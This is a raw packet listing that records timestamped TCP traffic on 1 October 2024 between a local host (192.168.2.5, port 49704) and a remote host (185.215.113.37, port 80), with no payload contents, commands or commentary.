Oct 1, 2024 16:50:05.603704929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603704929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603710890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603720903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603738070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603765965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603777885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603816986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603858948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603869915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603894949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603910923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603931904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603943110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603957891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603965044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603967905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.603974104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603981018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.603987932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604008913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604012012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604012012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604029894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604094028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604098082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604101896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604104996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604110003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604140043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604149103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604149103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604151964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604162931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604188919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604218006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604283094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604295015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604304075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604316950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604327917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604330063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604372025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604372025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604397058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604424000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604437113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604460955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604460955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604464054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604475975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.604495049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604502916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.604520082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726174116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726197004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726210117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726224899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726236105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726247072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726259947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726259947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726300955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726447105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726490021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726527929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726543903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726598024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726598024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726603031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726617098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726629972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726651907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726655960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726667881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726677895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726695061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726695061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726742029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726754904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726762056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726768970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726788044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726795912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726802111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726809025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726811886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726816893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726823092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726831913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726870060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726870060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726892948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726902962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726913929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726957083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.726963043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726979971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.726990938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727010012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727055073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727124929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727165937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727165937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727175951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727243900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727246046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727253914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727262020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727272034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727282047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727292061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727320910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727320910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727391958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727432013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727442026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727463961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727466106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727468967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727483988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727493048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727493048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727499008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727514982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727515936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727531910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727543116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727554083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727566004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727566957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727576971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727583885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727586985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727596998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727608919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727621078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727621078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727621078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727634907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727647066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727653980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727664948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727677107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727686882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727690935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727690935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727696896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727709055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727718115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727721930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727739096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727740049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727754116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727761030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727765083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727776051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727786064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727798939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727813959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727833986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727840900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727840900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727849007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727864027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727874041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727884054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727884054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727885962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727917910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727917910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.727938890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727951050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727967024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727977037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727988958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.727988005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728015900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728034019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728040934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728059053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728064060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728074074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728092909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728092909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728106022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728118896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728128910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728132963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728141069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728163958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728204012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728255033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728266001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728271961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728326082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728326082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728349924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728362083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728374004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728390932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728399992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728404999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728410959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728414059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728430986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728442907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728470087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728470087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728492975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728512049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728524923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728548050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728559971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728569031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728569031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728573084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728584051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728585005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728610039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728661060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728662968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728674889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728693008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728724957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728727102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728727102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728732109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728737116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728744030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728754044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728765965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728776932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728787899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728806973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728806973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728815079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728835106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728849888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728863955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728868008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728874922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.728905916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.728954077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.814821005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814836979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814852953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814866066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814882040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814893007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814910889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814922094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.814963102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815036058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815109968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815123081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815141916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815152884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815160990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815162897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815179110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815188885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815200090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815201044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815216064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815242052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815340996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815351963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815365076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815398932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815412998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815412998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815414906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815433025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815438986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815443993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815448999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815491915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815491915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815511942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815526009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815529108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815536022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815548897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815571070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815577030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815598011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815612078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815614939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815614939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815624952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815644979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815656900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815656900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815673113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815684080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815701962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815711975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815713882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815713882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815723896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815735102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815757036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815807104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815848112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815890074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815902948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815906048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815964937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.815968990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.815979958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816004038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816019058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816020012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816030979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816041946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816054106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816071033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816071987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816071987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816083908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816095114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816106081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816107035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816131115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816138029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816143036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816150904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816174030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816174984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816174030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:05.816185951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:05.816220045 CEST	80	49704	185.215.113.37	192.168.2.5
